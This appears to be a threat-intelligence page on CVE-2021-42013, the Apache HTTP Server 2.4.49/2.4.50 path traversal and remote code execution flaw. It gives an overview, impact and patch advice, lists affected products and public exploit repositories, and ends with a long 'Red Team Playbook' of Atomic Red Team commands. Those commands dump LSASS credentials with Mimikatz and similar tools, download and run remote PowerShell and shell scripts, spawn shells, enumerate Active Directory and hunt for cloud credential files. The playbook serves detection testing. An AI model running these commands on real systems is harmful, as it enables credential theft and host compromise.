CVE-2021-42013
Overview
This vulnerability is a path traversal flaw in the Apache HTTP Server's URL path normalization mechanism affecting versions 2.4.49 and 2.4.50. The root cause lies in improper sanitization of URL-encoded path segments, allowing mapping of URLs to files outside the intended directories configured by Alias-like directives. The affected component is the path resolution logic within the HTTP server, specifically impacting how aliased paths are handled in conjunction with CGI script execution.
Vulnerability Description
It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.
Impact
An unauthenticated attacker can exploit this flaw to read arbitrary files on the server or execute arbitrary code remotely if CGI scripts are enabled on the targeted aliased paths. This may result in unauthorized disclosure of sensitive information such as configuration files or credentials and complete system compromise through remote code execution. No user interaction or authentication is required to trigger the vulnerability, enabling potential full control over the affected server and lateral movement within the network.
Solution
Apply the vendor-released patches that address this path traversal vulnerability by upgrading Apache HTTP Server to versions later than 2.4.50 where the fix is implemented. Refer to the Apache security advisory at https://httpd.apache.org/security/vulnerabilities_24.html for detailed patch instructions. Additional vendor advisories including Cisco and Fedora provide guidance and updates (e.g., Cisco Security Advisory cisco-sa-apache-httpd-pathtrv-LAzg68cZ and Fedora package announcements). Ensure that default access controls such as "require all denied" are enforced on directories outside the document root as an interim mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in question arises from a path traversal flaw in specific versions of the Apache HTTP Server, particularly 2.4.49 and 2.4.50. This weakness allows an attacker to manipulate URL requests in such a way that they can access files outside the intended directories configured by Alias-like directives. The issue stems from an inadequate fix for a previously identified vulnerability, which highlights the importance of thorough testing and validation of security patches. When the server is misconfigured or when the default access controls, such as "require all denied," are not properly enforced, attackers can exploit this flaw to gain unauthorized access to sensitive files.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious URL that includes directory traversal sequences, such as "../", to navigate the file system and access files that should be restricted. If the server is configured to allow CGI scripts in these aliased paths, the implications are even more severe, as it opens the door for remote code execution. This means that an attacker could potentially execute arbitrary code on the server, leading to full system compromise. The simplicity of the attack, combined with the high likelihood of misconfiguration in real-world environments, makes this vulnerability particularly concerning.
The real-world impact of this vulnerability can be significant, especially for organizations that rely on the affected versions of the Apache HTTP Server. Successful exploitation could lead to data breaches, unauthorized access to sensitive information, and disruption of services. For businesses, this translates into potential financial losses, reputational damage, and legal ramifications, especially if sensitive customer data is exposed. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, indicating that it poses a severe risk to affected systems and their users.
To detect and mitigate this vulnerability, organizations should first ensure that they are running a version of the Apache HTTP Server that is not affected by this flaw. Regularly updating software to the latest stable releases is a fundamental practice in cybersecurity hygiene. Additionally, organizations should conduct thorough security audits of their server configurations, ensuring that access controls are properly enforced and that sensitive files are adequately protected. Implementing web application firewalls (WAFs) can also help in detecting and blocking malicious requests that attempt to exploit this vulnerability. Furthermore, continuous monitoring of server logs for unusual access patterns can provide early warning signs of attempted exploitation.
In conclusion, the path traversal vulnerability in specific versions of the Apache HTTP Server presents a serious threat to organizations that utilize this widely adopted web server software. The potential for unauthorized access and remote code execution necessitates immediate attention and action from system administrators and security professionals. By adopting proactive detection and mitigation strategies, organizations can significantly reduce their risk exposure and safeguard their critical assets against exploitation.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2021-42013, highlighted by the emergence of multiple new proof-of-concept exploits and the release of a Metasploit module that significantly lowers the technical barrier for attackers. This surge is accompanied by the vulnerability’s formal inclusion in the CISA KEV catalog, underscoring its criticality and increasing visibility among defenders. Our telemetry indicates a rapid expansion of the exploit landscape, with publicly available tools facilitating easier and more widespread exploitation attempts. Additionally, the association of this vulnerability with an Iranian IRGC-linked ransomware group signals a growing trend of leveraging CVE-2021-42013 in financially motivated attacks, elevating its operational risk. The EPSS score nearing certainty further confirms the high likelihood of exploitation in the wild. Collectively, these developments elevate the threat level to critical, demanding heightened vigilance as adversaries increasingly weaponize this flaw to achieve remote code execution and unauthorized access in vulnerable Apache HTTP Server deployments.
Affected Products (10)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Apache | Http Server | 2.4.49 |
cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*
|
|
|
Apache | Http Server | 2.4.50 |
cpe:2.3:a:apache:http_server:2.4.50:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 34 |
cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 35 |
cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*
|
|
|
Oracle | Instantis Enterprisetrack | 17.1 |
cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*
|
|
|
Oracle | Instantis Enterprisetrack | 17.2 |
cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*
|
|
|
Oracle | Instantis Enterprisetrack | 17.3 |
cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*
|
|
|
Oracle | Jd Edwards Enterpriseone Tools | All |
cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
|
|
|
Oracle | Secure Backup | All |
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
|
|
Netapp | Cloud Backup | N/A |
cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Apache 2.4.49/2.4.50 Traversal RCE
exploits/multi/http/apache_normalize_path_rce
|
Ash Daulton, Dhiraj Mishra, mekhalleh (RAMELLA Sébastien) | Unknown | - | View |
|
Apache 2.4.49/2.4.50 Traversal RCE scanner
auxiliary/scanner/http/apache_normalize_path
|
Ash Daulton, Dhiraj Mishra, mekhalleh (RAMELLA Sébastien) | Unknown | - | View |
ExploitDB (3)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE) | Lucas Souza | webapps | multiple | - | View |
| Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) | ThelastVvV | webapps | multiple | - | View |
| Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) | Valentin Lobstein | webapps | multiple | - | View |
GitHub PoCs (32)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
walnutsecurity/cve-2021-42013
cve-2021-42013.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in ...
|
walnutsecurity | 27 | 13 | 2021-10-27 | View |
|
Vulnmachines/cve-2021-42013
Apache 2.4.50 Path traversal vulnerability
|
Vulnmachines | 15 | 3 | 2021-10-08 | View |
|
andrea-mattioli/apache-exploit-CVE-2021-42013
Exploit with integrated shodan search
|
andrea-mattioli | 9 | 5 | 2021-10-07 | View |
|
asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp
Apache 远程代码执行 (CVE-2021-42013)批量检测工具:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apach...
|
asaotomo | 10 | 2 | 2021-12-23 | View |
|
TheLastVvV/CVE-2021-42013_Reverse-Shell
PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI
|
TheLastVvV | 7 | 2 | 2021-10-24 | View |
|
twseptian/cve-2021-42013-docker-lab
Docker container lab to play/learn with CVE-2021-42013
|
twseptian | 2 | 6 | 2021-10-14 | View |
|
K3ysTr0K3R/CVE-2021-42013-EXPLOIT
A PoC exploit for CVE-2021-42013 - Apache 2.4.49 & 2.4.50 Remote Code Execution
|
K3ysTr0K3R | 7 | 0 | 2023-08-25 | View |
|
BassoNicolas/CVE-2021-42013
CVE-2021-42013 Vulnerability Scanner This Python script checks for the Remote Code Execution (RCE) vulnerability (CVE-2...
|
BassoNicolas | 3 | 0 | 2024-04-07 | View |
|
TheLastVvV/CVE-2021-42013
Poc CVE-2021-42013 - Apache 2.4.50 without CGI
|
TheLastVvV | 2 | 0 | 2021-10-23 | View |
|
robotsense1337/CVE-2021-42013
Exploit Apache 2.4.50(CVE-2021-42013)
|
robotsense1337 | 1 | 1 | 2021-11-03 | View |
|
cybfar/cve-2021-42013-httpd
CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Path Traversal or Remote Code Execution vulnerabilities in Ap...
|
cybfar | 1 | 1 | 2023-06-08 | View |
|
Hamesawian/CVE-2021-42013
|
Hamesawian | 1 | 1 | 2023-06-29 | View |
|
jas9reet/CVE-2021-42013-LAB
Apache HTTP Server 2.4.50 - RCE Lab
|
jas9reet | 1 | 0 | 2022-02-03 | View |
|
vudala/CVE-2021-42013
Exploring CVE-2021-42013, using Suricata and OpenVAS to gather info
|
vudala | 1 | 0 | 2023-06-20 | View |
|
bananoname/cve-2021-42013
|
bananoname | 1 | 0 | 2024-07-31 | View |
|
drackyjr/CVE-2021-42013
A comprehensive Python-based vulnerability scanner for detecting CVE-2021-41773 and CVE-2021-42013 path traversal and re...
|
drackyjr | 1 | 0 | 2025-11-19 | View |
|
xMohamed0/CVE-2021-42013-ApacheRCE
|
xMohamed0 | 0 | 1 | 2021-11-14 | View |
|
asepsaepdin/CVE-2021-42013
|
asepsaepdin | 0 | 1 | 2025-01-30 | View |
|
eunho87/CVE-2021-42013
|
eunho87 | 0 | 0 | 2026-07-08 | View |
|
Joapath/CVE-2021-42013
|
Joapath | 0 | 0 | 2026-06-24 | View |
|
hadrian3689/apache_2.4.50
CVE-2021-42013 - Apache 2.4.50
|
hadrian3689 | 0 | 0 | 2022-04-18 | View |
|
viliuspovilaika/cve-2021-42013
Exploit for Apache 2.4.50 (CVE-2021-42013)
|
viliuspovilaika | 0 | 0 | 2022-05-31 | View |
|
mightysai1997/cve-2021-42013.get
|
mightysai1997 | 0 | 0 | 2022-09-15 | View |
|
12345qwert123456/CVE-2021-42013
Vulnerable configuration Apache HTTP Server version 2.4.49/2.4.50
|
12345qwert123456 | 0 | 0 | 2022-11-18 | View |
|
dream434/cve-2021-42013-apache
On October 4, 2021, Apache HTTP Server Project released Security advisory on a Path traversal and File disclosure vulner...
|
dream434 | 0 | 0 | 2024-07-16 | View |
|
Makavellik/POC-CVE-2021-42013-EXPLOIT
Una herramienta avanzada de escaneo, explotación e interacción remota diseñada para detectar y aprovechar la vulnerabili...
|
Makavellik | 0 | 0 | 2025-09-05 | View |
|
FakhriCRD/Apache-CVE-2021-42013-RCE-Exploit
A powerful and reliable exploit tool for Apache HTTP Server vulnerabilities CVE-2021-41773 and CVE-2021-42013. This tool...
|
FakhriCRD | 0 | 0 | 2025-10-28 | View |
|
zeynepglygt/apache-cve-2021-42013-rce
Apache HTTP Server (2.4.49) üzerinde CVE-2021-42013 zafiyetini (Path Traversal & RCE) simüle eden Docker tabanlı sızma t...
|
zeynepglygt | 0 | 0 | 2026-03-12 | View |
|
mightysai1997/cve-2021-42013L
|
mightysai1997 | 0 | 0 | 2022-09-15 | View |
|
mightysai1997/cve-2021-42013
|
mightysai1997 | 0 | 0 | 2022-09-15 | View |
|
LayarKacaSiber/CVE-2021-42013
|
LayarKacaSiber | 0 | 0 | 2021-10-20 | View |
|
ranasen-rat/cve-2021-42013
|
ranasen-rat | 0 | 0 | 2026-01-24 | View |
Threat Feed
35 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
